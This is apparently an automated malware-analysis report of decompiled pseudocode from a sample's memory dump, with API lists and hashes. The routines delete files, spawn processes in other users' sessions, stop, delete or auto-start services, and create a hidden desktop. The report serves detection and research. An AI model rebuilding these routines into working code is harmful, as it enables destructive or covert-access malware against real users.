                                                                                                        Function 70982960, Relevance: 22.6, APIs: 15, Instructions: 107filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E70982960() {
				intOrPtr _v8;
				short _v1048;
				short _v1056;
				short _v1060;
				struct _WIN32_FIND_DATAW _v1644;
				signed char _v1648;
				signed int _t24;
				void* _t28;
				void* _t42;
				intOrPtr _t49;
				WCHAR* _t58;
				void* _t60;
				void* _t61;

				_push(0x250);
				_push( &(_v1644.ftLastAccessTime));
				L7098BF02();
				_push(0x410);
				_push( &_v1048);
				L7098BF02();
				_t49 =  *0x7098f5cc; // 0xb757b8
				_push(_t49);
				_t24 = wsprintfW( &_v1060, StrChrW(0x7098c564, 0x25));
				_t60 =  &(_v1644.ftLastAccessTime) + 0xc;
				_push(_v8);
				_push(0x2a);
				_push(0x7098c560);
				_t58 = _t60 + 0x274 + _t24 * 2;
				wsprintfW(_t58, StrChrW(0x7098c550, 0x25));
				_t61 = _t60 + 0x14;
				_t28 = FindFirstFileW( &_v1048,  &(_v1644.ftCreationTime));
				_t42 = _t28;
				 *_t58 = 0;
				if(_t42 == 0xffffffff) {
					return _t28;
				} else {
					do {
						if(lstrcmpW( &(_v1644.cFileName), StrChrW(0x7098c548, 0x2e)) == 0 || lstrcmpW( &(_v1644.dwReserved1), StrChrW(0x7098c540, 0x2e)) == 0) {
							 *_t58 = 0;
						} else {
							lstrcatW( &_v1056,  &(_v1644.dwReserved1));
							if((_v1648 & 0x00000010) == 0) {
								if(_v8 == 0) {
									E709827F0( &_v1056);
									_t61 = _t61 + 4;
									 *_t58 = 0;
								} else {
									DeleteFileW( &_v1056);
									 *_t58 = 0;
								}
							} else {
								 *_t58 = 0;
							}
						}
					} while (FindNextFileW(_t42,  &_v1644) != 0);
					return FindClose(_t42);
				}
			}
















                                                                                                        0x7098296a
                                                                                                        0x70982973
                                                                                                        0x70982974
                                                                                                        0x70982979
                                                                                                        0x70982985
                                                                                                        0x70982986
                                                                                                        0x7098298b
                                                                                                        0x70982997
                                                                                                        0x709829b0
                                                                                                        0x709829b9
                                                                                                        0x709829bc
                                                                                                        0x709829bd
                                                                                                        0x709829bf
                                                                                                        0x709829cb
                                                                                                        0x709829d6
                                                                                                        0x709829d8
                                                                                                        0x709829e8
                                                                                                        0x709829ee
                                                                                                        0x709829f2
                                                                                                        0x709829f9
                                                                                                        0x70982ab4
                                                                                                        0x709829ff
                                                                                                        0x70982a05
                                                                                                        0x70982a18
                                                                                                        0x70982a8b
                                                                                                        0x70982a2f
                                                                                                        0x70982a3c
                                                                                                        0x70982a47
                                                                                                        0x70982a59
                                                                                                        0x70982a79
                                                                                                        0x70982a7e
                                                                                                        0x70982a83
                                                                                                        0x70982a5b
                                                                                                        0x70982a63
                                                                                                        0x70982a6b
                                                                                                        0x70982a6b
                                                                                                        0x70982a49
                                                                                                        0x70982a4b
                                                                                                        0x70982a4b
                                                                                                        0x70982a47
                                                                                                        0x70982a9b
                                                                                                        0x00000000
                                                                                                        0x70982aa4

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(00000250,00000250), ref: 70982974
                                                                                                        • RtlZeroMemory.NTDLL(?,00000410), ref: 70982986
                                                                                                        • StrChrW.SHLWAPI(7098C564,00000025,00B757B8,?,00000410,00000250,00000250), ref: 7098299F
                                                                                                        • wsprintfW.USER32 ref: 709829B0
                                                                                                        • StrChrW.SHLWAPI(7098C550,00000025,7098C560,0000002A,?), ref: 709829D2
                                                                                                        • wsprintfW.USER32 ref: 709829D6
                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 709829E8
                                                                                                        • StrChrW.SHLWAPI(7098C548,0000002E), ref: 70982A0C
                                                                                                        • lstrcmpW.KERNEL32(?,00000000), ref: 70982A14
                                                                                                        • StrChrW.SHLWAPI(7098C540,0000002E), ref: 70982A21
                                                                                                        • lstrcmpW.KERNEL32(?,00000000), ref: 70982A29
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 70982A3C
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 70982A63
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 70982A95
                                                                                                        • FindClose.KERNEL32(00000000), ref: 70982AA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$MemoryZerolstrcmpwsprintf$CloseDeleteFirstNextlstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 1322953341-0
                                                                                                        • Opcode ID: 1dfc894b610860f0cf6e28755281196a64a447d3cbb1e30175a8c215ad9cd5ec
                                                                                                        • Instruction ID: 05c437833e3bc916f4adfb2bf67bebfa7c369eaa215db4db621023534ee72d8f
                                                                                                        • Opcode Fuzzy Hash: 1dfc894b610860f0cf6e28755281196a64a447d3cbb1e30175a8c215ad9cd5ec
                                                                                                        • Instruction Fuzzy Hash: 0C318DB221C345AAD724EB64CC49FEF77ACAFC4700F404A2DB546962D0E775A5049B63
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983760, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84sleepprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 69%
                                                                                                        			E70983760(intOrPtr _a8) {
				WCHAR* _v28;
				struct _STARTUPINFOW _v100;
				struct _PROCESS_INFORMATION _v116;
				long _v120;
				void* _v124;
				void* _t19;
				void* _t27;
				WCHAR* _t30;
				void* _t38;
				intOrPtr _t39;

				_push(_a8);
				_t19 = E70983600();
				_t38 = _t19;
				_t39 = 0;
				if(_t38 != 0) {
					_push(0);
					_push(_t38);
					_push( &(_v100.lpDesktop));
					_v100.lpTitle = 0x20;
					_v100.lpDesktop = 0;
					L7098BF92();
					if(_t19 != 0) {
						_v100.cb = 0x420;
					}
					_push(0x44);
					_push( &(_v100.dwY));
					L7098BF02();
					_v100.lpTitle = 0x44;
					_v100.dwX = StrChrW(0x7098c678, 0x57);
					_push(0x10);
					_push( &(_v116.dwProcessId));
					L7098BF02();
					_t30 = _v28;
					while(CreateProcessAsUserW(_t38, 0, _t30, 0, 0, 0, _v120, _v124, 0,  &_v100,  &_v116) == 0) {
						Sleep(0x1f4);
						_t39 = _t39 + 1;
						if(_t39 < 0x78) {
							continue;
						}
						L8:
						_t27 = _v124;
						if(_t27 != 0) {
							_push(_t27);
							L7098BF8C();
						}
						return CloseHandle(_t38);
					}
					CloseHandle(_v116.hThread);
					CloseHandle(_v116);
					goto L8;
				}
				return _t19;
			}













                                                                                                        0x70983769
                                                                                                        0x7098376a
                                                                                                        0x7098376f
                                                                                                        0x70983771
                                                                                                        0x70983778
                                                                                                        0x7098377e
                                                                                                        0x7098377f
                                                                                                        0x70983784
                                                                                                        0x70983785
                                                                                                        0x7098378d
                                                                                                        0x70983791
                                                                                                        0x70983798
                                                                                                        0x7098379a
                                                                                                        0x7098379a
                                                                                                        0x709837a4
                                                                                                        0x709837aa
                                                                                                        0x709837ab
                                                                                                        0x709837b7
                                                                                                        0x709837c5
                                                                                                        0x709837c9
                                                                                                        0x709837cf
                                                                                                        0x709837d0
                                                                                                        0x709837d5
                                                                                                        0x709837e0
                                                                                                        0x7098380b
                                                                                                        0x70983811
                                                                                                        0x70983815
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983833
                                                                                                        0x70983833
                                                                                                        0x7098383b
                                                                                                        0x7098383d
                                                                                                        0x7098383e
                                                                                                        0x7098383e
                                                                                                        0x00000000
                                                                                                        0x70983844
                                                                                                        0x7098382a
                                                                                                        0x70983831
                                                                                                        0x00000000
                                                                                                        0x70983831
                                                                                                        0x7098384b

                                                                                                        APIs
                                                                                                          • Part of subcall function 70983600: WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098362E
                                                                                                          • Part of subcall function 70983600: WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098368C
                                                                                                          • Part of subcall function 70983600: Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098369C
                                                                                                        • CreateEnvironmentBlock.USERENV ref: 70983791
                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 709837AB
                                                                                                        • StrChrW.SHLWAPI(7098C678,00000057,?,00000044,?,00000000), ref: 709837BF
                                                                                                        • RtlZeroMemory.NTDLL(?,00000010), ref: 709837D0
                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,00000010,?,00000000), ref: 70983800
                                                                                                        • Sleep.KERNEL32(000001F4,?,00000000), ref: 7098380B
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 7098382A
                                                                                                        • CloseHandle.KERNEL32(00000020,?,00000000), ref: 70983831
                                                                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 7098383E
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70983844
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleMemory$BlockCreateEnvironmentSleepZero$DestroyEnumerateFreeProcessSessionsUser
                                                                                                        • String ID: $D
                                                                                                        • API String ID: 826248435-1196817373
                                                                                                        • Opcode ID: b1274c68f16adf4752f7a724e50c11a07ce076e84fba4e6a59123e56ee0dcdae
                                                                                                        • Instruction ID: 36eb2fd7b516ed40a44d65f8ed5d3c4e0f42c05adff4f7409e192c6ae65eba0f
                                                                                                        • Opcode Fuzzy Hash: b1274c68f16adf4752f7a724e50c11a07ce076e84fba4e6a59123e56ee0dcdae
                                                                                                        • Instruction Fuzzy Hash: AB2181B2518302AFD210DF64CC85F6F77A8AB84B44F10891CF681A73C1D774E8098BA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985220, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81processnativesynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 73%
                                                                                                        			E70985220(intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				DWORD* _v0;
				signed int _v4;
				signed int _v8;
				WCHAR* _v12;
				struct _STARTUPINFOW _v84;
				char _v92;
				void* _v96;
				void* _v100;
				signed int _t17;
				signed int _t23;
				long _t27;
				DWORD* _t30;
				intOrPtr _t33;
				struct _PROCESS_INFORMATION* _t44;

				_t44 =  &_v84;
				_push(0x44);
				_push( &(_v84.dwX));
				L7098BF02();
				_push(0x10);
				_push( &_v92);
				L7098BF02();
				_t17 = _v8;
				_v84.cb = 0x44;
				if(_t17 == 0) {
					_v84.dwFlags = 1;
				}
				_t33 = _a12;
				if(_t33 != 0) {
					_v84.lpDesktop = _t33;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _v12, 0, 0, 0,  ~_t17 & 0x08000000, 0, _a8,  &_v84, _t44) == 0) {
					return 0;
				} else {
					_t23 = _v4;
					if(_t23 != 0) {
						if(_t23 == 0xffffffff) {
							_t27 = _t23 | 0xffffffff;
						} else {
							_t27 = _t23 * 0x3e8;
						}
						if(WaitForSingleObject(_v100, _t27) != 0) {
							if(_a4 != 0) {
								_push(0);
								_push(_v100);
								L7098BF20();
							}
						} else {
							_t30 = _v0;
							if(_t30 != 0) {
								GetExitCodeProcess(_v100, _t30);
							}
						}
					}
					CloseHandle(_v96);
					CloseHandle(_v100);
					return 1;
				}
			}

















                                                                                                        0x70985220
                                                                                                        0x70985223
                                                                                                        0x70985229
                                                                                                        0x7098522a
                                                                                                        0x7098522f
                                                                                                        0x70985235
                                                                                                        0x70985236
                                                                                                        0x7098523b
                                                                                                        0x7098523f
                                                                                                        0x70985249
                                                                                                        0x7098524b
                                                                                                        0x7098524b
                                                                                                        0x70985253
                                                                                                        0x70985259
                                                                                                        0x7098525b
                                                                                                        0x7098525b
                                                                                                        0x70985271
                                                                                                        0x7098528e
                                                                                                        0x70985302
                                                                                                        0x70985290
                                                                                                        0x70985290
                                                                                                        0x70985296
                                                                                                        0x7098529b
                                                                                                        0x709852a5
                                                                                                        0x7098529d
                                                                                                        0x7098529d
                                                                                                        0x7098529d
                                                                                                        0x709852b5
                                                                                                        0x709852d1
                                                                                                        0x709852d6
                                                                                                        0x709852d8
                                                                                                        0x709852d9
                                                                                                        0x709852d9
                                                                                                        0x709852b7
                                                                                                        0x709852b7
                                                                                                        0x709852bd
                                                                                                        0x709852c4
                                                                                                        0x709852c4
                                                                                                        0x709852bd
                                                                                                        0x709852b5
                                                                                                        0x709852ea
                                                                                                        0x709852f1
                                                                                                        0x709852fc
                                                                                                        0x709852fc

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 7098522A
                                                                                                        • RtlZeroMemory.NTDLL(00000044,00000010), ref: 70985236
                                                                                                        • CreateProcessW.KERNEL32 ref: 70985286
                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 709852AD
                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 709852C4
                                                                                                        • NtTerminateProcess.NTDLL(00000000,00000000), ref: 709852D9
                                                                                                        • CloseHandle.KERNEL32(00000044), ref: 709852EA
                                                                                                        • CloseHandle.KERNEL32(00000044), ref: 709852F1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Process$CloseHandleMemoryZero$CodeCreateExitObjectSingleTerminateWait
                                                                                                        • String ID: D
                                                                                                        • API String ID: 2123967418-2746444292
                                                                                                        • Opcode ID: fe95927e144eb93ed3208e543a5dfd273c1710e1ca6260259c92b89189ff7185
                                                                                                        • Instruction ID: 301ae07f4bff29488904f28c69c4d59d34b527d9b392caa24fc7ebe16aa89411
                                                                                                        • Opcode Fuzzy Hash: fe95927e144eb93ed3208e543a5dfd273c1710e1ca6260259c92b89189ff7185
                                                                                                        • Instruction Fuzzy Hash: CA212FB1618301ABE614DB64CC85F5F73EDAB84B04F204A1DB5A6D73D0DB74E8088B63
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982EF0, Relevance: 15.1, APIs: 10, Instructions: 84fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 67%
                                                                                                        			E70982EF0(intOrPtr _a4, intOrPtr _a8) {
				short _v1040;
				short _v1044;
				short _v1048;
				char _v1628;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				void* _t22;
				signed char _t23;
				WCHAR* _t31;
				intOrPtr _t44;
				void* _t45;
				FILETIME* _t47;

				_t44 = _a4;
				_push(_a8);
				_push(0x2a);
				_push(_t44);
				_t45 = 0;
				wsprintfW( &_v1044, StrChrW(0x7098c550, 0x25));
				_t47 =  &( &_v1636->ftLastWriteTime);
				_push(0x250);
				_push( &_v1628);
				L7098BF02();
				_t22 = FindFirstFileW( &_v1044,  &_v1636);
				_v1640 = _t22;
				if(_t22 != 0xffffffff) {
					do {
						_t23 = _v1636.dwFileAttributes;
						if((_t23 & 0x00000010) == 0 && _t23 != 0) {
							_push( &(_v1636.cFileName));
							_push(_t44);
							wsprintfW( &_v1048, StrChrW(0x7098c658, 0x25));
							_t47 = _t47 + 0x10;
							_t31 = DeleteFileW( &_v1040);
							if(_t31 == 0) {
								MoveFileExW( &_v1040, _t31, 4);
							}
							_t45 = 1;
						}
					} while (FindNextFileW(_v1640,  &_v1636) != 0);
					FindClose(_v1640);
					return _t45;
				} else {
					return 0;
				}
			}















                                                                                                        0x70982f00
                                                                                                        0x70982f0e
                                                                                                        0x70982f0f
                                                                                                        0x70982f11
                                                                                                        0x70982f19
                                                                                                        0x70982f2c
                                                                                                        0x70982f2e
                                                                                                        0x70982f31
                                                                                                        0x70982f3a
                                                                                                        0x70982f3b
                                                                                                        0x70982f4d
                                                                                                        0x70982f53
                                                                                                        0x70982f5a
                                                                                                        0x70982f70
                                                                                                        0x70982f70
                                                                                                        0x70982f76
                                                                                                        0x70982f80
                                                                                                        0x70982f81
                                                                                                        0x70982f94
                                                                                                        0x70982f96
                                                                                                        0x70982fa1
                                                                                                        0x70982fa9
                                                                                                        0x70982fb6
                                                                                                        0x70982fb6
                                                                                                        0x70982fbc
                                                                                                        0x70982fbc
                                                                                                        0x70982fd1
                                                                                                        0x70982fda
                                                                                                        0x70982fec
                                                                                                        0x70982f5f
                                                                                                        0x70982f68
                                                                                                        0x70982f68

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098C550,00000025,?,0000002A,?), ref: 70982F1B
                                                                                                        • wsprintfW.USER32 ref: 70982F2C
                                                                                                        • RtlZeroMemory.NTDLL(?,00000250), ref: 70982F3B
                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,00000250), ref: 70982F4D
                                                                                                        • StrChrW.SHLWAPI(7098C658,00000025,?,?), ref: 70982F89
                                                                                                        • wsprintfW.USER32 ref: 70982F94
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 70982FA1
                                                                                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 70982FB6
                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 70982FCB
                                                                                                        • FindClose.KERNEL32(?), ref: 70982FDA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$wsprintf$CloseDeleteFirstMemoryMoveNextZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 3499340181-0
                                                                                                        • Opcode ID: 70437ab3cd028dff20c295c8bfb41d8af11f807edc198c9e4d54a2c4de8c518a
                                                                                                        • Instruction ID: 612befb7d7f31f1958da066ac93defcd7a96b567f0871dfffd565ce099fe44cc
                                                                                                        • Opcode Fuzzy Hash: 70437ab3cd028dff20c295c8bfb41d8af11f807edc198c9e4d54a2c4de8c518a
                                                                                                        • Instruction Fuzzy Hash: 1F2158B22183419BD220DB65DC88FDF77ACEBC4714F100A1DFA45922C0E736A40997A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983850, Relevance: 15.1, APIs: 10, Instructions: 76servicesleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70983850(short* _a4, intOrPtr _a8) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _v32;
				short* _t12;
				void* _t24;
				void* _t28;
				void* _t31;
				int _t32;

				_t32 = 0;
				_v32 = 0;
				_t12 = OpenSCManagerW(0, 0, 0xf003f);
				_t24 = _t12;
				if(_t24 != 0) {
					L2:
					_t28 = OpenServiceW(_t24, _a4, 0xf01ff);
					if(_t28 == 0) {
						L13:
						CloseServiceHandle(_t24);
						L14:
						return _t32;
					}
					QueryServiceStatus(_t28,  &_v28);
					if(_v24 == 1) {
						L9:
						if(_a8 != 0) {
							_v32 = DeleteService(_t28);
						} else {
							_v32 = 1;
						}
						L12:
						CloseServiceHandle(_t28);
						_t32 = _v32;
						goto L13;
					}
					if(ControlService(_t28, 1,  &_v28) == 0) {
						goto L12;
					}
					_t31 = 0;
					while(1) {
						QueryServiceStatus(_t28,  &_v28);
						if(_v24 == 1) {
							goto L9;
						}
						Sleep(0x3e8);
						_t31 = _t31 + 1;
						if(_t31 < 0x3c) {
							continue;
						}
						goto L12;
					}
					goto L9;
				}
				_t24 = OpenSCManagerW(_t12, _t12, 1);
				if(_t24 == 0) {
					goto L14;
				}
				goto L2;
			}











                                                                                                        0x7098385c
                                                                                                        0x70983865
                                                                                                        0x70983869
                                                                                                        0x7098386b
                                                                                                        0x7098386f
                                                                                                        0x70983881
                                                                                                        0x70983893
                                                                                                        0x70983897
                                                                                                        0x7098390f
                                                                                                        0x70983910
                                                                                                        0x70983918
                                                                                                        0x7098391f
                                                                                                        0x7098391f
                                                                                                        0x7098389f
                                                                                                        0x709838aa
                                                                                                        0x709838e8
                                                                                                        0x709838ed
                                                                                                        0x70983900
                                                                                                        0x709838ef
                                                                                                        0x709838ef
                                                                                                        0x709838ef
                                                                                                        0x70983904
                                                                                                        0x70983905
                                                                                                        0x7098390b
                                                                                                        0x00000000
                                                                                                        0x7098390b
                                                                                                        0x709838bc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709838c4
                                                                                                        0x709838c6
                                                                                                        0x709838cc
                                                                                                        0x709838d7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709838de
                                                                                                        0x709838e0
                                                                                                        0x709838e4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709838e6
                                                                                                        0x00000000
                                                                                                        0x709838c6
                                                                                                        0x70983877
                                                                                                        0x7098387b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 70983869
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 70983875
                                                                                                        • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 7098388D
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 7098389F
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 709838B4
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 709838CC
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 709838DE
                                                                                                        • DeleteService.ADVAPI32(00000000), ref: 709838FA
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 70983905
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 70983910
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$Open$CloseHandleManagerQueryStatus$ControlDeleteSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3264530519-0
                                                                                                        • Opcode ID: fb8774b8859cd379b8a5c7873dfb2314d93266d657332774b548cb1bc2cd8659
                                                                                                        • Instruction ID: 72d8fa8917945177f01b41c9f3e9a93b176ec162092e6d5d9959f981b1f0cf7c
                                                                                                        • Opcode Fuzzy Hash: fb8774b8859cd379b8a5c7873dfb2314d93266d657332774b548cb1bc2cd8659
                                                                                                        • Instruction Fuzzy Hash: C62192B2158305EBD7019F558C88B3F7BACEB89644F10042DF90293390DBB5D9489AA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983920, Relevance: 13.6, APIs: 9, Instructions: 80memoryserviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70983920(int _a4, short** _a8, int _a12) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _t14;
				long _t18;
				int _t26;
				void* _t31;
				void* _t33;

				_t31 = _a4;
				if(_t31 == 0) {
					return 0;
				} else {
					_a4 = 0;
					if(QueryServiceConfigW(_t31, 0, 0,  &_a4) != 0) {
						_t18 = _a4;
						_t26 = _t18;
						_t33 = HeapAlloc(GetProcessHeap(), 8, _t18);
						if(_t33 != 0) {
							if(QueryServiceConfigW(_t31, _t33, _t26,  &_a4) != 0 &&  *((intOrPtr*)(_t33 + 4)) != 2) {
								ChangeServiceConfigW(_t31, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
							}
							HeapFree(GetProcessHeap(), 0, _t33);
						}
					}
					_t14 = QueryServiceStatus(_t31,  &_v28);
					if(_v24 != 4 || _t14 == 0) {
						StartServiceW(_t31, _a12, _a8);
					}
					return 1;
				}
			}










                                                                                                        0x70983924
                                                                                                        0x7098392a
                                                                                                        0x709839e7
                                                                                                        0x70983930
                                                                                                        0x70983941
                                                                                                        0x7098394d
                                                                                                        0x7098394f
                                                                                                        0x70983958
                                                                                                        0x70983967
                                                                                                        0x7098396b
                                                                                                        0x70983979
                                                                                                        0x70983996
                                                                                                        0x70983996
                                                                                                        0x709839a6
                                                                                                        0x709839a6
                                                                                                        0x709839ad
                                                                                                        0x709839b4
                                                                                                        0x709839c0
                                                                                                        0x709839d1
                                                                                                        0x709839d1
                                                                                                        0x709839e0
                                                                                                        0x709839e0

                                                                                                        APIs
                                                                                                        • QueryServiceConfigW.ADVAPI32 ref: 70983949
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000), ref: 7098395A
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70983961
                                                                                                        • QueryServiceConfigW.ADVAPI32(?,00000000,?,?), ref: 70983975
                                                                                                        • ChangeServiceConfigW.ADVAPI32(?,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 70983996
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098399F
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709839A6
                                                                                                        • QueryServiceStatus.ADVAPI32(?,?), ref: 709839B4
                                                                                                        • StartServiceW.ADVAPI32(?,?,?), ref: 709839D1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$Heap$ConfigQuery$Process$AllocChangeFreeStartStatus
                                                                                                        • String ID:
                                                                                                        • API String ID: 1115209516-0
                                                                                                        • Opcode ID: 593dd96af61de1ebce5e2cbaf76e92e7d022a28926e15ad201bc4061b2c55eb2
                                                                                                        • Instruction ID: 6405523034b53891feb1dec1df36d40566e3a63ad90ff5354d217acd5e901cb5
                                                                                                        • Opcode Fuzzy Hash: 593dd96af61de1ebce5e2cbaf76e92e7d022a28926e15ad201bc4061b2c55eb2
                                                                                                        • Instruction Fuzzy Hash: BB11A2B2218300EBD6105B95CC49F6F7BBCAB84B64F504629F556D63D0D6B1D8009B63
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A020, Relevance: 13.5, APIs: 9, Instructions: 43threadsleepsynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098A020() {
				void* _v0;
				struct HDESK__* _t3;
				struct HDESK__* _t10;
				void* _t12;

				_t3 = GetThreadDesktop(GetCurrentThreadId());
				 *0x7098f534 = _t3;
				if(_t3 != 0) {
					_t3 = CreateDesktopW(StrChrW(0x7098cad4, 0x54), 0, 0, 0, 0x10000000, 0);
					 *0x7098f530 = _t3;
					if(_t3 != 0) {
						_t12 = CreateThread(0, 0, E70989B10, _v0, 0, 0);
						if(_t12 != 0) {
							WaitForSingleObject(_t12, 0xffffffff);
							CloseHandle(_t12);
							Sleep(0xfa0);
						}
						_t10 =  *0x7098f530; // 0x0
						return CloseDesktop(_t10);
					}
				}
				return _t3;
			}







                                                                                                        0x7098a027
                                                                                                        0x7098a02d
                                                                                                        0x7098a034
                                                                                                        0x7098a051
